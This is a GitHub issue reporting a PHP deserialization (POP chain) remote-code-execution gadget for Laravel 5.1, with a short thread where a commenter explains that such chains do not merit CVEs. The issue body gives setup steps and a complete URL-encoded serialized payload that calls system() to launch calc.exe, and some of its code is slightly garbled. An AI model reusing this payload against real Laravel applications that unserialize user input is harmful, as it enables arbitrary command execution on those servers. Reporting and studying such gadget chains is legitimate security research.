New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Laravel5.1 Unserialize RCE #2
Comments
|
Hello @beicheng-maker, Would you please not request new CVE for POP chains? Thank you, |
|
Hello! Dear @beicheng-maker, I mean: CVEs are NOT for POP chains. If you find an untrusted input in the But if you find a POP chain and used your own If you have any questions, I can answer them. CC: @Y4tacker, @guoyanan1g. Thank you |
ok thank you very much for your answer and have a nice life |
Laravel 5.1 POP Chain
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"app/Http/Controllers/UsersController.php adding a controller UsersControllerroutes/web.php
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);EXP
O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7DThe text was updated successfully, but these errors were encountered: